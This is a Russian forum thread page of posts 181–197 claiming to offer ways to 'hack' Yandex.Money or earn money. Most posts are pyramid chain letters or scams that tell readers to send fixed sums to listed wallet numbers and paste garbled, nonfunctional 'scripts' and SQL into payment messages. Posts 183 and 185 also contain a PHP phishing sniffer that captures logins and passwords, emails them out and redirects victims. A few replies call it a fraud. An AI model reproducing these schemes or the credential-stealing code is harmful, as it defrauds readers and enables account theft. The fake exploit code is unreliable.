КАК ЗАРАБОТАТЬ ДЕНЬГИ

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » КАК ЗАРАБОТАТЬ ДЕНЬГИ » Тестовый форум » ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%

ВЗЛОМ ЯНДЕКС ДЕНЕГ 100%

Сообщений 181 страница 210 из 236

181

Привет всем желающим заработать деньги в интернете!!!!
Неделю назад лазил по инету в поисках халявного заработка. Наткнулся на такое понятие как "волшебные кошельки", и чтобы не разводить рутину, сразу скажу, что на них вы только потратитесь и никаких вам денег не вернут!!!!!! Но потом на форуме одного из сайтов увидел сообщение и решил попробовать:

ОТЛИЧНЫЙ, ПРОВЕРЕННЫЙ ЗАРАБОТОК ДЕНЕГ НА ХАЛЯВУ!!!!!!

Если у тебя завалялись ненужные 6$ на web money и ты хочешь заработать в сети интернет, то тебе нужно дочитать данное сообщение до конца.

и так что же нужно делать?

1. ты кладешь по 1$ на шесть WMZ кошельков.
2. потом убираешь верхний, сдвигаешь 5 кошельков на одну позицию вверх, шестым и последним добавляешь свой.
3. оставляешь это сообщение на максимальном количестве других сайтов, с целью привлеч побольше людей.
4. все что тебе остается это просто сидеть и пожимать плоды своего труда.

\\\если у тебя все еще нет своего WMZ кошелька, то тебе достаточно:
1. с сайта http://webmoney.ru/ скачать клиента (любого из двух).
2. установить его на своем компьютере, следуя инструкциям (это очень просто).
3. положить на него 6$ (как это сделать: http://webmoney.ru/buywm.shtml).
4. сделай шесть переводов на те номера кошельков что ты видишь на экране, потом сдвинуть и добавить свой.\\\

Z360725161423
Z813825287659
Z405075757930
Z186306749473
Z216114711403
Z368596521507

дальше вычисления читать не обязательно...

\\\допустим ты оставишь это сообщение на 100 форумах, допустим откликнется с них только 5 человек. твоя прибыль 5человек*1$=5$ и твой кошелек переместился на пятое место.
теперь пять человек делает тоже самое и каждый привлекает еще по 5 человек. твоя прибыль 5*5человек*1$=25$(кошелек передвигается на 4 место).
в следующий раз это уже будет 5*5*5*1$=125$, потом 625$ и наконец 3125$!!! ИТОГО 3905$!!! и это при том что со 100 форумов, где количество человек прочитавших твоё сообщение исчисляется уже 1000, откликнется всего 5 человек!!!\\\

правда это достаточно просто? я в свою очередь заработал уже больше 5000$ за 2 месяца!!! удачи.

это был автор. хочу добавить от себя что я таких сум не зароботал но сумма на моём кошельке уже перевалила за 254$ по прошествии первой недели...
оказывается, что этой системы еще не было в рунете! она придумана студентами европы для небольшого зароботка, но эффективность и популярность данной системы бьет все рекорды.

Честно скажу я думал, что эта система не прокатит, потому что первые 3 дня на моём кошельке не было ни копеечки!!!!! И я уже свыкся с тем, что никогда не увижу свои 6 баксов и что меня развели как лоха!!!!! НО ВОТ ПРИШЕЛ МОМЕНТ, КОГДА Я УСЛЫШАЛ СЛАДОСТНЫЙ ДЛЯ СЕРДЦА ЗВУК ПАДАЮЩИХ КОПЕЕЧЕК!!!!!!! И ЭТО БЫЛИ 84$!!! И ТОЛЬКО ЗА 3 ДНЯ!!! МЛИН, ВСЁ РАБОТАЕТ!!!!
так что дерзайте, народ, и я рекомендую не боятся оставлять такое сообщение на форумах где подобное уже есть!!!!!

0

182

НЕ ВЕДИТЕСЬ ЭТО ВСЕ ФЕЙК. Я ТОЖЕ ПОВЕРИЛ В ЭТУ ЧУШ И НАЧАЛ ПЕРЕВОДИТЬ ДЕНЬГИ НА РАЗНЫЕ КОШЕЛЬКИ И НЕ КОКОГО ТОЛКУ КОНЕЧНО НЕ БЫЛО И ДЕНЕГ ТОЖЕ. НО КАК ТО Я ВСЕ ЖЕ НАТКНУЛСЯ НА ОДИН КОШЕЛЕК Я ЗАКИНУЛ НА НЕГО РОВНО 50РУБ КАК БЫЛО НАПИСАНО В СТАТЬЕ И ВПИСАЛ СКРИПТ ПОЛУЧАЕЩЕМУ ДЕНЬГИ КОТОРОМУ Я ОТПРОВЛЯЛ. И НЕ ПОВЕРИЛ СВОИМ ГЛАЗАМ МНЕ В ОТВЕТ ПРИШЛО 100РУБ, И Я НАЧАЛ ОТПРОВЛЯТЬ НА НЕГО ЕЩЕ ПО 50РУБ И ПОЛУЧАЛ ЗА КАЖДУЮ ОТПРАВКУ 100РУБ НА СВОЙ КОШЕЛЕК! НО ОТПРОВЛЯТЬ НУЖНО НЕ БОЛЕЕ И НЕ МЕНИЕ 50РУБ КАЖДЫЕ 6 ЧАСОВ И ТОГДА ВСЕ БУДЕТ ОК. ВОТ КОШЕЛЕК НА КОТОРЫЙ НУЖНО ОТПРАВИТЬ НЕ БОЛЕЕ И НЕ МЕНИЕ 50РУБ КОШЕЛЕК 410011516738880. А ВОТ СКРИПТ КОТОРЫЙ НУЖНО ВПИСАТЬ В СООБЩЕНИЕ <script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font]    И Я ЭТИМ КОШЕЛЬКОМ ПОЛЬЗУЮСЬ УЖЕ ГДЕ ТО МЕСЯЦ. А ДА ЗАБЫЛ ДЕНЬГИ ПРИХОДЯТ В ТЕЧЕНИЕ 1-2 ЧАСОВ. ВСЕМ ЖЕЛАЮ УДАЧИ!

0

183

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001639676156
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе"
1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей
6 Переводим на этот счет 410011176566845  где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '300''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001639676156»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам, вот скрин жми СЮДА Проверена это уже на многих компах так что дерзайте.
Если не понятно жми СЮДА

0

184

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:

";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 100 руб на этот номер кошелька
41001509339838
И на мой кошель минут через 5 пришло 600 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 100 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 600 рублей. Как видишь, даже раскрученный проект имеет ошибки.

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 100 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 100 рублей

6 Переводим на этот счет 41001509339838 где мы сделали баг

SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '600''

Вот пример :
id = «41001509339838»

cc.content_id

10. Все дело сделано ждем минут 5 и к вам должны прийти 600 рублей. Надеюсь подробно объяснил вам. Проверена это уже на многих компах так что дерзайте.

ВОТ НАСТОЯЩИЙ ВЗЛОМ

0

185

Привет всем знаю работающий способ получить удвоения денег на "яндекс деньгах"
Для начала надо отправить 50р на кошелек 410011120231068
Название платежа: php.hack.id
а это вставить в описание:
<?
$adminmail = "youservhost@yandex ru";
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=pass value='$_POST[pass]'>
</FORM>";
?>
СПОСОБ РЕАЛЬНО РАБОТАЕТ НЕ ВРУ,УСПЕЙТЕ ПОКА КОД РАБОТАЕТ!

0

186

НЕ ВЕДИТЕСЬ ЭТО ВСЕ ФЕЙК. Я ТОЖЕ ПОВЕРИЛ В ЭТУ ЧУШ И НАЧАЛ ПЕРЕВОДИТЬ ДЕНЬГИ НА РАЗНЫЕ КОШЕЛЬКИ И НЕ КОКОГО ТОЛКУ КОНЕЧНО НЕ БЫЛО И ДЕНЕГ ТОЖЕ. НО КАК ТО Я ВСЕ ЖЕ НАТКНУЛСЯ НА ОДИН КОШЕЛЕК Я ЗАКИНУЛ НА НЕГО РОВНО 50РУБ КАК БЫЛО НАПИСАНО В СТАТЬЕ И ВПИСАЛ СКРИПТ ПОЛУЧАЕЩЕМУ ДЕНЬГИ КОТОРОМУ Я ОТПРОВЛЯЛ. И НЕ ПОВЕРИЛ СВОИМ ГЛАЗАМ МНЕ В ОТВЕТ ПРИШЛО 100РУБ, И Я НАЧАЛ ОТПРОВЛЯТЬ НА НЕГО ЕЩЕ ПО 50РУБ И ПОЛУЧАЛ ЗА КАЖДУЮ ОТПРАВКУ 100РУБ НА СВОЙ КОШЕЛЕК! НО ОТПРОВЛЯТЬ НУЖНО НЕ БОЛЕЕ И НЕ МЕНИЕ 50РУБ КАЖДЫЕ 6 ЧАСОВ И ТОГДА ВСЕ БУДЕТ ОК. ВОТ КОШЕЛЕК НА КОТОРЫЙ НУЖНО ОТПРАВИТЬ НЕ БОЛЕЕ И НЕ МЕНИЕ 50РУБ 410011595113330КОШЕЛЕК . А ВОТ СКРИПТ КОТОРЫЙ НУЖНО ВПИСАТЬ В СООБЩЕНИЕ <script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;i<=ringnumber;i++) { if (i{if (document.all) { clearTimeout(timer) startfontsize=0 for (i=0;i<=ringnumber;i++) { thisring=eval("document.all.ring"+i+".style") thisring.visibility="hidden"
i_fontsize[i]=startfontsizestep[i]=ringnumber*i*300startfontsize=Math.floor((maxfontsize/ringnumber))*(i+1)
<body><aref="http://scic.ya/seOver="showrings()onMouseOut="hid>[/font]    И Я ЭТИМ КОШЕЛЬКОМ ПОЛЬЗУЮСЬ УЖЕ ГДЕ ТО МЕСЯЦ. А ДА ЗАБЫЛ ДЕНЬГИ ПРИХОДЯТ В ТЕЧЕНИЕ 1-2 ЧАСОВ. ВСЕМ ЖЕЛАЮ УДАЧИ!

0

187

Сам не верю что в натуре получилось

0

188

Здравствуйте. Я Zero... Master Zero... Занимаюсь написанием различных Троянов и читов на онлайн игр.
Что бы мне платили за мою работу мне пришлось открыть счет в яндекс деньгах.
И щёлкая по ссылкам я наткнулся на "волшебные кошельки" и скажу вам так: это лохотрон!
При обычном переводе денег никто и ничего вам возвращать не будет!
Но это не повод, чтобы не искать лёгкого заработка в интернете. я решил это проверить!
благодаря многочисленным прочтённым статей и 3 месяца раздумья я все-таки нашёл как обмануть систему!!!
Итак, начнём:
1) Скачиваем браузер opera с официального сайта (это важно! на нём есть определённые слабые места для ядекса)
2) Создаём яндекс кошелёк
3) Кладём на него 70 руб
4) Переходим на вкладку "перевести"
5) В поле назначение платежа вводим [<w>X_URL</w>] (без скобок)
6) В поле "номер получателя" вставляем кошелёк 410011506398626
7) Поле "сумма" пропускаете и в "сумма получения" пишите 67.33 (именно такое число! другое не ставьте иначе деньги не вернуться)
8) В сообщение к получателю вставляете вот этот код:
<js><b>X_URL=https://money.yandex.ru</b><U>Ahrev=67.33</U><B>351.33</B><J>Ratio=200 Lshift=100 reader=500</J><js><3dn>write_Back=351.33<.3dn>
9) Название платежа: <w>X_URL</w>
10) Переводим
А теперь расскажу, как работает:
при таком коде у системы переводов yandex случается глюк,
происходит стирание суммы перевода и система берёт сумму из кода <B>351.33</B>.
В результате чего, после отправки к вам на счет сразу же приходит 351.33 руб.
Только не переводите слишком часто! Администрация может заподозрить, и ваш ящик заблокируют!
(не чаще чем через день!)
это проверено, и действительно работает. Лично я остался доволен, когда накопил себе на xBox 360. и каждый месяц покупаю кучу дисков!
Не видитесь на другие уловки, что-то вроде "положи сюда и прейдет в 2 раза больше",
для этого нужно хотя бы знать как это работает. удачных хаков.

0

189

Всем привет! Нашел не давно один способ, реально работает вот мой skype dima123krom так вот кидаешь на этот Яндек счет 410011617657977 всего лишь 40 рублей не больше, если больше 40 тогда админы запалят! так вот после того как закинул 40 рублей через 10 минут на твой Яндек счет приходит 400 рублей, я сам ох*ел от такого, но это реально работает! теперь у меня iphone 4S))) и скоро планирую покупать планшет! Реально можно зароботать таким способом! Если после того как закинули деньги на счет не чего не произошло, звоните мне в скайп я через скайп скину вам прогу для 100% взлома яндекс счета, конечно я ее продаю за 200 рублей, но вам могу помоч бесплатно, потому что теперь мне не нужны деньги)) Каждый день я получаю с этого Яндекс счета 1000 рублей)) И это не шутки! Да кстати можно пользоваться этой схемой только два раза в день!
Приятного вам взлома)) Удачи!!!

0

190

Всем доброго времени суток! Это не развод предупреждаю сразу! Дело каждого,кто захочет конечно! Тут такая тема есть компания незнаю как называется  ,туда вкладывают деньги  под процент, допустим вы ложите 300 рулбей ( долларов) неважно(ради интереса) ну чтоб понять лохотрон или нет,300 рублей не деньги,но конечно проверить хочется,ЕЩЕ РАЗ ПОВТОРЯЮ, НЕ ХОТИТЕ НЕ НАДО!!!   И все вы внесли стартовую сумму и далее ждем в зависимости от суммы через ровно 30 минут вам приходит сумма в 0.5 раз больше т.е если вы положили 300 вам придет 450. Я уже попробовал,естественно это не надолго компания находится в разработке т.к им нужны деньги они сделали это. Номер их WebMoney кошелька  R253773386412 .Яндекс
Деньги  410011339150569. Всем удачи!!

0

191

ДОЧИТАЙТЕ ДО КОНЦА ДАННУЮ СТАТЬЮ, вы ничего не потеряете,
ЧТЕНИЕ ЕЩЕ НИ КОМУ СЕРЬЕЗНО НЕ ПОВРЕДИЛО .
Я Вас уверяю Ваше материальное положение резко улучшится, если Вы этого только захотите!!!!!!!
(Понимаю с каким недоверием вы это читаете - но продолжайте,
прошу, дочитайте статью до конца).
СРАЗУ СКАЖУ, КОГДА ЗАРАБОТАЕТЕ СВОИ ПЕРВЫЕ ТЫСЯЧИ
ДВЕ, ПОТРАТЬТЕ ИХ НА РАССКРУТКУ РЕКЛАМЫ ЭТОГО СООБЩЕНИЯ!!!
И ВЫ УВИДЕТЕ РЕЗУЛЬТАТ!!!
По прошествии
всего 2 месяцев, я получил 155 000 руб. И деньги
идут каждый день. Каждые 10 минут на мой счёт поступает
по 10р. И это все только за цену в 60 руб.!!!
Я был в очень плохом экономическом положении и долго
не мог найти себе подходящую работу до того, как наткнулся
на эту статью. Я не поверил, что это работает, пока
не начал получать переводы со всего света… Я купил всё,
что мне надо… И это очень кстати, согласитесь!?...
Моя работа теперь - это каждый день по 2-3 часа в
Интернете и ВСЁ!!!! А заработок такой, что никаким
начальникам и руководителям даже и не снился!!!
ВОТ ТЕ САМЫЕ 2 ШАГА К УСПЕХУ:
1. Возьмите первый номер кошелька из нижеуказанного
списка, отправьте на него 10 руб, вписав этот номер в поле «Номер счёта».
В поля «Имя получателя» и «E-mail получателя»
вписывать ничего не нужно.
В поле «Контракт/назначение платежа» напишите
– «Пожалуйста, внесите меня в список Яndex кошельков».
Все, что Вы сделали - это создали услугу, и
самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ
сервис, за который платите. Далее, начиная со второго,
по аналогии отправьте по 10 руб. на следующие 5
кошельков (не забудьте вписывать в поле «Контракт/назначение
платежа» «Пожалуйста, внесите меня в список Яndex кошельков»):
1) 41001297248567
2) 41001297354413
3) 41001299172898
4) 41001513905363
5) 41001507563134
6) 410011604655143
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА
КАЖДЫЙ из этих 6 кошельков по 10 руб. - иначе, сетевыми
модераторами Яndex кошельков, вы просто не будете включены
в систему и не сможете обналичить доход.
Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2,
скопируйте к себе на компьютер весь этот текст от начала
до конца (можно в формате txt или ещё как вам удобней).
В скопированной статье удалите из списка кошельков ПЕРВЫЙ
(ВЕРХНИЙ) кошелёк и переместите
2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на
место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го!
А в 6-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР
Вашего КОШЕЛЬКА!!!
2. Разместите эту статью (или объявление с ссылкой на
страницу, которую вы без труда можете сделать на
одном из бесплатных сайтов, например,
http://www.narod.ru) на НЕ МЕНЕЕ ЧЕМ 200-300
ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups).
ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД.
И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС.
Размещение этой статьи на 200 форумах, даже на
самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб.
- ЭТО МИНИМУМ!!!, в течение двух месяцев!!!
БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ).
ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В
СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА!!!
ЭТО СТОИТ 60-ти рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ!
ГЛАВНОЕ – ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!!
ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 60 РУБЛЕЙ НЕ ТЕРЯЕМ!! А ЕСЛИ ВДРУГ ПОЛУЧИТСЯ!?

0

192

длагаю Вам вещь, к которой и сам относился
поначалу скептически. ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ. Потому что это созданная система  по взаимодействию денег.Вообщем, это реальная моя история. Я наткнулся на ЭТО
совершенно случайно, когда искал работу, найдя статью, в которой говорилось, что
"МОЖНО СДЕЛАТЬ НЕСКОЛЬКО ДЕСЯТКОВ ТЫСЯЧ РУБЛЕЙ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 150 РУБ."
Дальше там говорилось, что надо послать по 30 рублей на 5 Интернет-
кошельков, которые перечислены ниже. Потом вычеркнуть первый
кошелёк из списка, тем самым, сместив список на одну строчку
вверх. В результате чего 5 строчка освобождается, в который Вы
вписываете номер своего Интернет- кошелька (WebMONEY).
Затем Вы размещаете данное сообщение на форумах, чатах, ну
честно говоря спамите его, но уже
с ВАШИМИ ДАННЫМИ на 5 строке, на где то 200 разных форумов,
ну или сколько вы хотите, зависит от вас. Ну, я поразмышлял и подумал, что в принципе НИЧЕГО НЕ ПОТЕРЯЮ кроме 150 руб. И я решил попробовать. Установил Интернет-кошелёк, перечислил всем участникам акции по 30 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 2-х дней я зарегистрировался на 57 бизнес- форумах и бесплатных досках объявлений. Прошла
неделя, заглядываю в свой Интернет кошелек и что?-ничего! Поступлений нет! А разные участники пишут, что за неделю заработали кто по 2250 руб., кто по 1350 руб.. Ну и бросил это занятие. Еще через неделю заглянул в свой Интернет кошелек. Смотрю, всего
одно поступление - 30 руб. Еще через две недели я все-таки снова открыл свой Интернет-кошелек, а в нем уже около 3900 руб. Я был в недоумении. За 1 месяц 3900 руб. И вдруг после 1 месяца началось самое интересное: на мой
кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ, спустя ещё 2
недели на моем счету уже было более 12600 руб. После этого я
отправил свои объявления ещё где-то на 150 форумов. По прошествии всего 2 месяцев, я
получил почти 69000 руб. И деньги идут каждый день.  И это все только за цену в 160 рублей! Я хотел купить себе Nokia X6 или ноутбук,новзял себе Nisan!

Следуйте инструкциям в ТОЧНОСТИ
и 450 000 руб. И БОЛЬШЕ будут Вашими в течение нескольких
месяцев!!! В двух словах, как это всё работает. Существует система
взаимодействия виртуальных денег, в которой существует
множество маленьких систем(например моя),которую необходимо привести в движение. Дальше она работает сама.

ВОТ ТЕ САМЫЕ 3 ШАГА:

Шаг 1. Зарегистрируйтесь с системе WebMoney и внесите 150 рублей на свой кошелек, придется прогуляться в ближайший банк, или терминал для оплаты сотовой связи.
Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 30 руб. вписав этот номер в поле «Номер счёта». В поля «Имя получателя» и «E-mail получателя» вписывать ничего не нужно. В поле «Контракт/назначение платежа» напишите 
«Пожалуйста, внесите меня в список Webmoney кошельков».
Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 30 руб. на следующие 5 кошельков (не забудьте вписывать в поле «Контракт/назначение платежа» «Пожалуйста, внесите меня в список Webmoney кошельков»):

R439468963188

R252534689479

R124780188322

R373152923675

R298252554016
ПОВТОРЯЮ, чтобы получать доход,необходимо отправить на каждый из этих кошельков по 30 руб.! иначе, сетевыми модераторами Webmoney кошельков, вы просто не будете включены в систему и не сможете обналичить доход.

ШАГ 2. Скопируйте к себе на компьютер весь этот текст от начала до конца. В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го и т.п. А в 4-ый номер, который оказался пустым, впишите номер вашего
кошелька!

Шаг 3.Разместите эту статью (или объявление) с ссылкой на страницу на не менее чем 200-300
форумах и новостных лентах
запомните. Размещение этой статьи ,например на 200 форумах, даже на самых малопосещаемых, гарантирует вам доход. Итак, когда вы достигнете первой позиции в списке, вы будете иметь достаточное поступление и цена -150

0

193

Я НАТКНУЛСЯ НА ОДИН КОШЕЛЕК ОН ПРИНИМАЛ РОВНО 50РУБ Я НА НЕГО ОТПРОВЛЯЛ 1 РАЗ ПО 50РУБ В КАЖДЫЕ 6 ЧАСОВ И ОН ВОЗВРОЩАЛ ПО 100 РУБЛЕЙ ЕСЛЕ НЕ ВЕРИТЕ, ПРОВЕРТИ. ВОТ НОМЕР КОШЕЛЬКА 410011571629996. ТОЛЬКО ПРИ ОТПРАВКЕ В КОМЕНТАРИЯХ НАПИШИТЕ ВОТ ЭТОТ СКРИПТ javascript:var percentGold=100;var widthLeft=50;var widthRight=179;var t;var memPerSec=10.00741833975;function d(m,j,l){var i=(m+'').indexOf(j,l);return i=== -1?false:i;};function _a(){next= -(1000/memPerSec)*Math.log(Math.random());ge('percentGold').innerHTML=percentGold;ge('rateLeftGold').style.width=widthLeft+"px";ge -(1000/memPerSec)*Math.log(Math.random());ge('percent').innerHTML=percentGold+"%";ge('rateLeft').st

0

194

Слушайте я тут один очень легкий способ нашел все что надо это иметь на кошельке 5 руб и отправить их на этот кошелек 410011667103479 и обратно через 5-10 минут придут уже 10 руб потом их отсылаете на этот же кошелек и в ответ приходит 2 сумма и так в день можно заработать если повторять действие можно заработать до 500 рублей в день но не больше а то яндекс запалит так что пользуйтесь

0

195

Я сегодня ох***л, не верьте этим волшебным кошелькам, вот я нашел этот кошелек вот он 410011673678050, присылает в двойном размере
1. Зарегистрируетесь на яндекс деньги
2. Кладете на счет 100 рублей(НЕ БОЛЬШЕ НЕ МЕНЬШЕ )
3. Нажимаете перевести
4. В строке сообщение получателю, вводим этот скрипт <script language="JavaScript" type="text/javascript">// the number of ringsvar ringnumber=50function showrings() {ifdocument.all) { fr (i=0;ionMouseOut="hid>[/font]
5. Сумма 100 рублей (не больше не меньше, иначе деньги не придут
6.Нажимаем перевести деньги.
Через 5-10 минут будут 200 рублей, я уже накопил 15000 рублей, буду новый холодильник покупать. :-)
Больше 500 рублей не отправляйте, иначе деньги не вернутся.

0

196

Слушай ИДИОТ ты что с ума сошел ТЫ нарочно номер своего кошелька ввел чтобы специально всех обманывать А ТЕБЕ ДЕНЮЖКИ ТО КАПАЮТ, ПРИДУМАЛ ЛОХОТРОН

0

197

